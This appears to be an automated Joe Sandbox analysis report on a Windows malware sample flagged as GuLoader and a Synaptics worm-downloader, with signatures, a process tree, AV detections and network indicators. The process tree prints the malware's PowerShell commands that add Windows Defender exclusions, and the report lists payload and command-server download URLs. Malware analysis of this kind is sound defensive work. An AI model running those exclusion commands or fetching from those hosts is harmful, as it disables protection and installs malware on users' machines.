Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.Variant.FakeAlert.2.24488.8627

Overview

General Information

Sample Name:SecuriteInfo.com.Variant.FakeAlert.2.24488.8627 (renamed file extension from 8627 to exe)
Analysis ID:634939
MD5:c5bf732066ab84d1abba5b27638a5191
SHA1:07b3b8a0e9008e459bd7ba727dd8380320dbc5ad
SHA256:a4bdfb7869d435589479e095b8d0c9c2b8f987bd3a8c961424376f18c31c650f
Tags:exe
Infos:

Detection

GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Icon mismatch, binary includes an icon from a different legit application in order to fool users
Antivirus detection for URL or domain
Antivirus detection for dropped file
Yara detected GuLoader
Snort IDS alert for network traffic
Found malware configuration
Multi AV Scanner detection for submitted file
Antivirus / Scanner detection for submitted sample
Drops PE files to the document folder of the user
Tries to detect virtualization through RDTSC time measurements
Adds a directory exclusion to Windows Defender
Uses dynamic DNS services
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Contains functionality to detect sleep reduction / modifications
Antivirus or Machine Learning detection for unpacked file
Drops PE files to the application program directory (C:\ProgramData)
One or more processes crash
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Queries the installation date of Windows
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Checks if the current process is being debugged
Contains functionality to retrieve information about pressed keystrokes
Found large amount of non-executed APIs
May check if the current machine is a sandbox (GetTickCount - Sleep)
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Contains functionality to shutdown / reboot the system
May infect USB drives
Found potential string decryption / allocating functions
Contains functionality to call native functions
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to read the clipboard data
Found dropped PE file which has not been started or loaded
Contains functionality to record screenshots
PE file contains executable resources (Code or Archives)
IP address seen in connection with other malware
Enables debug privileges
Sample file is different than original file name gathered from version info
Extensive use of GetProcAddress (often used to hide API calls)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to launch a program with higher privileges
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Contains functionality to detect sandboxes (mouse cursor move detection)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • SecuriteInfo.com.Variant.FakeAlert.2.24488.exe (PID: 6280 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Variant.FakeAlert.2.24488.exe" MD5: C5BF732066AB84D1ABBA5B27638A5191)
    • cmd.exe (PID: 6292 cmdline: cmd /c powershell -Command "Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 6300 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • powershell.exe (PID: 6348 cmdline: powershell -Command "Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • powershell.exe (PID: 6700 cmdline: powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" MD5: DBA3E6449E97D4E3DF64527EF7012A10)
    • cmd.exe (PID: 6316 cmdline: cmd /c start "" "C:\Users\user\AppData\Local\Temp\uniformerede.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 6356 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • uniformerede.exe (PID: 6432 cmdline: "C:\Users\user\AppData\Local\Temp\uniformerede.exe" MD5: FEDAD1ADEC8A1D90444051B5BDC6445D)
        • ._cache_uniformerede.exe (PID: 6536 cmdline: "C:\Users\user\Desktop\._cache_uniformerede.exe" MD5: C4B2332489C0BA3E3F2A262F1C2C31B8)
        • Synaptics.exe (PID: 6620 cmdline: "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate MD5: 2A1D1C20CCA885322254DD2A22F51097)
          • WerFault.exe (PID: 6284 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6620 -s 2904 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
          • WerFault.exe (PID: 6872 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6620 -s 4052 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • Synaptics.exe (PID: 6884 cmdline: "C:\ProgramData\Synaptics\Synaptics.exe" MD5: 2A1D1C20CCA885322254DD2A22F51097)
  • EXCEL.EXE (PID: 6976 cmdline: "C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
  • cleanup

Malware Configuration

Threatname: GuLoader

{"Payload URL": "http://2.58.149.33/ominz_QLUnxlrvVz46.bin"}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\YC9w8Aif.exeJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
    C:\ProgramData\Synaptics\RCXCD96.tmpJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
      C:\Users\user\Documents\DUUDTUBZFW\~$cache1JoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
        C:\Users\user\AppData\Local\Temp\uniformerede.exeJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
          C:\ProgramData\Synaptics\Synaptics.exeJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
            Click to see the 3 entries

            Memory Dumps

            SourceRuleDescriptionAuthorStrings
            00000007.00000002.532970198.00000000030C0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
              00000006.00000000.270423175.0000000000401000.00000020.00000001.01000000.00000004.sdmpJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
                0000000C.00000002.316350277.0000000000401000.00000020.00000001.01000000.00000007.sdmpJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
                  00000009.00000000.364281736.0000000000401000.00000020.00000001.01000000.00000007.sdmpJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
                    00000009.00000000.357173364.0000000000401000.00000020.00000001.01000000.00000007.sdmpJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
                      Click to see the 7 entries

                      Unpacked PEs

                      SourceRuleDescriptionAuthorStrings
                      12.0.Synaptics.exe.400000.0.unpackJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
                        9.0.Synaptics.exe.400000.3.unpackJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
                          12.2.Synaptics.exe.400000.0.unpackJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
                            9.2.Synaptics.exe.400000.0.unpackJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
                              9.0.Synaptics.exe.400000.2.unpackJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
                                Click to see the 5 entries

                                Sigma Signatures

                                No Sigma rule has matched

                                Snort Signatures

                                Timestamp:192.168.2.369.42.215.25249739802832617 05/27/22-04:38:15.388403
                                SID:2832617
                                Source Port:49739
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected

                                Joe Sandbox Signatures

                                Click to jump to signature section

                                Show All Signature Results

                                AV Detection

                                barindex
                                Antivirus detection for URL or domain
                                Source: http://xred.site50.net/syn/SSLLibrary.dllAvira URL Cloud: Label: malware
                                Antivirus detection for dropped file
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeAvira: detection malicious, Label: WORM/Dldr.Agent.gqrxn
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeAvira: detection malicious, Label: W2000M/Dldr.Agent.17651006
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.FakeAlert.2.24488.exeAvira: detection malicious, Label: WORM/Dldr.Agent.gqrxn
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.FakeAlert.2.24488.exeAvira: detection malicious, Label: TR/Dropper.Gen
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.FakeAlert.2.24488.exeAvira: detection malicious, Label: W2000M/Dldr.Agent.17651006
                                Source: C:\Users\user\AppData\Local\Temp\YC9w8Aif.exeAvira: detection malicious, Label: WORM/Dldr.Agent.gqrxn
                                Source: C:\Users\user\AppData\Local\Temp\YC9w8Aif.exeAvira: detection malicious, Label: W2000M/Dldr.Agent.17651006
                                Source: C:\Users\user\Documents\DUUDTUBZFW\~$cache1Avira: detection malicious, Label: WORM/Dldr.Agent.gqrxn
                                Source: C:\Users\user\Documents\DUUDTUBZFW\~$cache1Avira: detection malicious, Label: W2000M/Dldr.Agent.17651006
                                Source: C:\Users\user\AppData\Local\Temp\RCXF979.tmpAvira: detection malicious, Label: WORM/Dldr.Agent.gqrxn
                                Source: C:\Users\user\AppData\Local\Temp\RCXF979.tmpAvira: detection malicious, Label: TR/Dropper.Gen
                                Source: C:\Users\user\AppData\Local\Temp\RCXF979.tmpAvira: detection malicious, Label: W2000M/Dldr.Agent.17651006
                                Source: C:\ProgramData\Synaptics\RCXCD96.tmpAvira: detection malicious, Label: WORM/Dldr.Agent.gqrxn
                                Source: C:\ProgramData\Synaptics\RCXCD96.tmpAvira: detection malicious, Label: W2000M/Dldr.Agent.17651006
                                Source: C:\ProgramData\Synaptics\Synaptics.exeAvira: detection malicious, Label: WORM/Dldr.Agent.gqrxn
                                Source: C:\ProgramData\Synaptics\Synaptics.exeAvira: detection malicious, Label: W2000M/Dldr.Agent.17651006
                                Source: C:\Users\user\AppData\Local\Temp\RCXDA77.tmpAvira: detection malicious, Label: WORM/Dldr.Agent.gqrxn
                                Source: C:\Users\user\AppData\Local\Temp\RCXDA77.tmpAvira: detection malicious, Label: TR/Dropper.Gen
                                Source: C:\Users\user\AppData\Local\Temp\RCXDA77.tmpAvira: detection malicious, Label: W2000M/Dldr.Agent.17651006
                                Found malware configuration
                                Source: 00000007.00000002.532970198.00000000030C0000.00000040.00001000.00020000.00000000.sdmpMalware Configuration Extractor: GuLoader {"Payload URL": "http://2.58.149.33/ominz_QLUnxlrvVz46.bin"}
                                Multi AV Scanner detection for submitted file
                                Source: SecuriteInfo.com.Variant.FakeAlert.2.24488.exeVirustotal: Detection: 62%Perma Link
                                Source: SecuriteInfo.com.Variant.FakeAlert.2.24488.exeReversingLabs: Detection: 58%
                                Antivirus / Scanner detection for submitted sample
                                Source: SecuriteInfo.com.Variant.FakeAlert.2.24488.exeAvira: detected
                                Machine Learning detection for dropped file
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeJoe Sandbox ML: detected
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.FakeAlert.2.24488.exeJoe Sandbox ML: detected
                                Source: C:\Users\user\AppData\Local\Temp\YC9w8Aif.exeJoe Sandbox ML: detected
                                Source: C:\Users\user\Documents\DUUDTUBZFW\~$cache1Joe Sandbox ML: detected
                                Source: C:\ProgramData\Synaptics\Synaptics.exeJoe Sandbox ML: detected
                                Source: 0.2.SecuriteInfo.com.Variant.FakeAlert.2.24488.exe.400000.0.unpackAvira: Label: TR/Dropper.Gen
                                Source: 9.0.Synaptics.exe.400000.4.unpackAvira: Label: WORM/Dldr.Agent.gqrxn
                                Source: 9.0.Synaptics.exe.400000.4.unpackAvira: Label: W2000M/Dldr.Agent.17651006
                                Source: 12.2.Synaptics.exe.400000.0.unpackAvira: Label: WORM/Dldr.Agent.gqrxn
                                Source: 12.2.Synaptics.exe.400000.0.unpackAvira: Label: W2000M/Dldr.Agent.17651006
                                Source: 9.2.Synaptics.exe.400000.0.unpackAvira: Label: WORM/Dldr.Agent.gqrxn
                                Source: 9.2.Synaptics.exe.400000.0.unpackAvira: Label: W2000M/Dldr.Agent.17651006
                                Source: 6.0.uniformerede.exe.4b8e14.1.unpackAvira: Label: TR/Patched.Ren.Gen
                                Source: 0.0.SecuriteInfo.com.Variant.FakeAlert.2.24488.exe.400000.0.unpackAvira: Label: TR/Dropper.Gen
                                Source: 6.2.uniformerede.exe.400000.0.unpackAvira: Label: WORM/Dldr.Agent.gqrxn
                                Source: 6.2.uniformerede.exe.400000.0.unpackAvira: Label: W2000M/Dldr.Agent.17651006
                                Source: 9.0.Synaptics.exe.400000.2.unpackAvira: Label: WORM/Dldr.Agent.gqrxn
                                Source: 9.0.Synaptics.exe.400000.2.unpackAvira: Label: W2000M/Dldr.Agent.17651006
                                Source: 0.2.SecuriteInfo.com.Variant.FakeAlert.2.24488.exe.a07634.1.unpackAvira: Label: TR/Patched.Ren.Gen
                                Source: 9.0.Synaptics.exe.400000.0.unpackAvira: Label: WORM/Dldr.Agent.gqrxn
                                Source: 9.0.Synaptics.exe.400000.0.unpackAvira: Label: W2000M/Dldr.Agent.17651006
                                Source: 6.2.uniformerede.exe.4b8e14.1.unpackAvira: Label: TR/Patched.Ren.Gen
                                Source: 6.0.uniformerede.exe.400000.0.unpackAvira: Label: WORM/Dldr.Agent.gqrxn
                                Source: 6.0.uniformerede.exe.400000.0.unpackAvira: Label: W2000M/Dldr.Agent.17651006
                                Source: 12.0.Synaptics.exe.400000.0.unpackAvira: Label: WORM/Dldr.Agent.gqrxn
                                Source: 12.0.Synaptics.exe.400000.0.unpackAvira: Label: W2000M/Dldr.Agent.17651006
                                Source: 9.0.Synaptics.exe.400000.3.unpackAvira: Label: WORM/Dldr.Agent.gqrxn
                                Source: 9.0.Synaptics.exe.400000.3.unpackAvira: Label: W2000M/Dldr.Agent.17651006
                                Source: 9.0.Synaptics.exe.400000.1.unpackAvira: Label: WORM/Dldr.Agent.gqrxn
                                Source: 9.0.Synaptics.exe.400000.1.unpackAvira: Label: W2000M/Dldr.Agent.17651006
                                Source: SecuriteInfo.com.Variant.FakeAlert.2.24488.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, DEBUG_STRIPPED, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dll
                                Source: unknownHTTPS traffic detected: 172.217.168.14:443 -> 192.168.2.3:49736 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 172.217.168.14:443 -> 192.168.2.3:49737 version: TLS 1.2
                                Source: C:\Users\user\Desktop\._cache_uniformerede.exeRegistry value created: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Uninstall\URBANITETENSJump to behavior
                                Source: SecuriteInfo.com.Variant.FakeAlert.2.24488.exe, 00000000.00000002.269486507.0000000000954000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: [autorun]
                                Source: SecuriteInfo.com.Variant.FakeAlert.2.24488.exe, 00000000.00000002.269486507.0000000000954000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: [autorun]
                                Source: SecuriteInfo.com.Variant.FakeAlert.2.24488.exe, 00000000.00000002.269486507.0000000000954000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: autorun.inf
                                Source: uniformerede.exeBinary or memory string: autorun.inf
                                Source: uniformerede.exeBinary or memory string: [autorun]
                                Source: uniformerede.exe, 00000006.00000000.270423175.0000000000401000.00000020.00000001.01000000.00000004.sdmpBinary or memory string: [autorun]
                                Source: uniformerede.exe, 00000006.00000000.270423175.0000000000401000.00000020.00000001.01000000.00000004.sdmpBinary or memory string: [autorun]
                                Source: uniformerede.exe, 00000006.00000000.270423175.0000000000401000.00000020.00000001.01000000.00000004.sdmpBinary or memory string: autorun.inf
                                Source: Synaptics.exeBinary or memory string: autorun.inf
                                Source: Synaptics.exeBinary or memory string: [autorun]
                                Source: Synaptics.exe, 00000009.00000000.364281736.0000000000401000.00000020.00000001.01000000.00000007.sdmpBinary or memory string: [autorun]
                                Source: Synaptics.exe, 00000009.00000000.364281736.0000000000401000.00000020.00000001.01000000.00000007.sdmpBinary or memory string: [autorun]
                                Source: Synaptics.exe, 00000009.00000000.364281736.0000000000401000.00000020.00000001.01000000.00000007.sdmpBinary or memory string: autorun.inf
                                Source: Synaptics.exeBinary or memory string: autorun.inf
                                Source: Synaptics.exeBinary or memory string: [autorun]
                                Source: Synaptics.exe, 0000000C.00000002.316350277.0000000000401000.00000020.00000001.01000000.00000007.sdmpBinary or memory string: [autorun]
                                Source: Synaptics.exe, 0000000C.00000002.316350277.0000000000401000.00000020.00000001.01000000.00000007.sdmpBinary or memory string: [autorun]
                                Source: Synaptics.exe, 0000000C.00000002.316350277.0000000000401000.00000020.00000001.01000000.00000007.sdmpBinary or memory string: autorun.inf
                                Source: uniformerede.exe.0.drBinary or memory string: [autorun]
                                Source: uniformerede.exe.0.drBinary or memory string: [autorun]
                                Source: uniformerede.exe.0.drBinary or memory string: autorun.inf
                                Source: SecuriteInfo.com.Variant.FakeAlert.2.24488.exe.9.drBinary or memory string: [autorun]
                                Source: SecuriteInfo.com.Variant.FakeAlert.2.24488.exe.9.drBinary or memory string: [autorun]
                                Source: SecuriteInfo.com.Variant.FakeAlert.2.24488.exe.9.drBinary or memory string: autorun.inf
                                Source: YC9w8Aif.exe.9.drBinary or memory string: [autorun]
                                Source: YC9w8Aif.exe.9.drBinary or memory string: [autorun]
                                Source: YC9w8Aif.exe.9.drBinary or memory string: autorun.inf
                                Source: ~$cache1.9.drBinary or memory string: [autorun]
                                Source: ~$cache1.9.drBinary or memory string: [autorun]
                                Source: ~$cache1.9.drBinary or memory string: autorun.inf
                                Source: RCXF979.tmp.9.drBinary or memory string: [autorun]
                                Source: RCXF979.tmp.9.drBinary or memory string: [autorun]
                                Source: RCXF979.tmp.9.drBinary or memory string: autorun.inf
                                Source: RCXCD96.tmp.6.drBinary or memory string: [autorun]
                                Source: RCXCD96.tmp.6.drBinary or memory string: [autorun]
                                Source: RCXCD96.tmp.6.drBinary or memory string: autorun.inf
                                Source: Synaptics.exe.6.drBinary or memory string: [autorun]
                                Source: Synaptics.exe.6.drBinary or memory string: [autorun]
                                Source: Synaptics.exe.6.drBinary or memory string: autorun.inf
                                Source: RCXDA77.tmp.9.drBinary or memory string: [autorun]
                                Source: RCXDA77.tmp.9.drBinary or memory string: [autorun]
                                Source: RCXDA77.tmp.9.drBinary or memory string: autorun.inf
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeFile opened: C:\Users\userJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeFile opened: C:\Users\user\AppDataJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.iniJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet ExplorerJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: 6_2_004099E0 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,6_2_004099E0
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: 6_2_00406018 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,6_2_00406018
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: 6_2_00409B1C FindFirstFileA,GetLastError,6_2_00409B1C
                                Source: C:\Users\user\Desktop\._cache_uniformerede.exeCode function: 7_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,7_2_00405D74
                                Source: C:\Users\user\Desktop\._cache_uniformerede.exeCode function: 7_2_0040290B FindFirstFileW,7_2_0040290B
                                Source: C:\Users\user\Desktop\._cache_uniformerede.exeCode function: 7_2_0040699E FindFirstFileW,FindClose,7_2_0040699E
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 9_2_004099E0 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,9_2_004099E0
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 9_2_00409B1C FindFirstFileA,GetLastError,9_2_00409B1C
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 9_2_00406018 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,9_2_00406018
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 12_2_00406018 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,12_2_00406018
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 12_2_004099E0 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,12_2_004099E0
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 12_2_00409B1C FindFirstFileA,GetLastError,12_2_00409B1C

                                Networking

                                barindex
                                Snort IDS alert for network traffic
                                Source: TrafficSnort IDS: 2832617 ETPRO TROJAN W32.Bloat-A Checkin 192.168.2.3:49739 -> 69.42.215.252:80
                                Uses dynamic DNS services
                                Source: unknownDNS query: name: freedns.afraid.org
                                C2 URLs / IPs found in malware configuration
                                Source: Malware configuration extractorURLs: http://2.58.149.33/ominz_QLUnxlrvVz46.bin
                                Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                                Source: Joe Sandbox ViewIP Address: 69.42.215.252 69.42.215.252
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: http://b.c2r.ts.cdn.office.net/pr
                                Source: Synaptics.exe, 00000009.00000000.353054699.0000000005450000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.358069688.0000000005450000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408273761.0000000005450000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr
                                Source: RCXDA77.tmp.9.drString found in binary or memory: http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                Source: SecuriteInfo.com.Variant.FakeAlert.2.24488.exe, 00000000.00000002.269486507.0000000000954000.00000004.00000800.00020000.00000000.sdmp, uniformerede.exe, 00000006.00000000.272489274.00000000004A5000.00000002.00000001.01000000.00000004.sdmp, uniformerede.exe, 00000006.00000003.281465224.0000000005E21000.00000004.00000800.00020000.00000000.sdmp, ._cache_uniformerede.exe, 00000007.00000002.531563073.000000000040A000.00000004.00000001.01000000.00000005.sdmp, ._cache_uniformerede.exe, 00000007.00000000.280135055.000000000040A000.00000008.00000001.01000000.00000005.sdmp, uniformerede.exe.0.dr, ._cache_uniformerede.exe.6.dr, Synaptics.exe.6.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: http://weather.service.msn.com/data.aspx
                                Source: uniformerede.exe, 00000006.00000003.286322922.0000000002210000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/SSLLibrary.dlX
                                Source: RCXDA77.tmp.9.drString found in binary or memory: http://xred.site50.net/syn/SSLLibrary.dll
                                Source: Synaptics.exe, 00000009.00000000.350557009.00000000021E0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.357490239.00000000021E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/SSLLibrary.dll6
                                Source: RCXDA77.tmp.9.drString found in binary or memory: http://xred.site50.net/syn/SUpdate.ini
                                Source: uniformerede.exe, 00000006.00000003.286322922.0000000002210000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/SUpdate.iniD0
                                Source: Synaptics.exe, 00000009.00000000.350557009.00000000021E0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.357490239.00000000021E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/SUpdate.iniZ
                                Source: RCXDA77.tmp.9.drString found in binary or memory: http://xred.site50.net/syn/Synaptics.rar
                                Source: Synaptics.exe, 00000009.00000000.350557009.00000000021E0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.357490239.00000000021E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/Synaptics.rarZ
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://addinsinstallation.store.office.com/app/acquisitionlogging
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://addinsinstallation.store.office.com/app/download
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/authenticated
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticated
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://addinsinstallation.store.office.com/orgid/appinstall/authenticated
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://addinslicensing.store.office.com/apps/remove
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://addinslicensing.store.office.com/commerce/query
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://addinslicensing.store.office.com/entitlement/query
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://addinslicensing.store.office.com/orgid/apps/remove
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://addinslicensing.store.office.com/orgid/entitlement/query
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://analysis.windows.net/powerbi/api
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://api.aadrm.com
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://api.aadrm.com/
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://api.addins.store.office.com/addinstemplate
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://api.addins.store.office.com/app/query
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://api.addins.store.officeppe.com/addinstemplate
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://api.cortana.ai
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://api.diagnostics.office.com
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://api.diagnosticssdf.office.com
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://api.diagnosticssdf.office.com/v2/feedback
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://api.diagnosticssdf.office.com/v2/file
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://api.microsoftstream.com/api/
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://api.office.net
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://api.onedrive.com
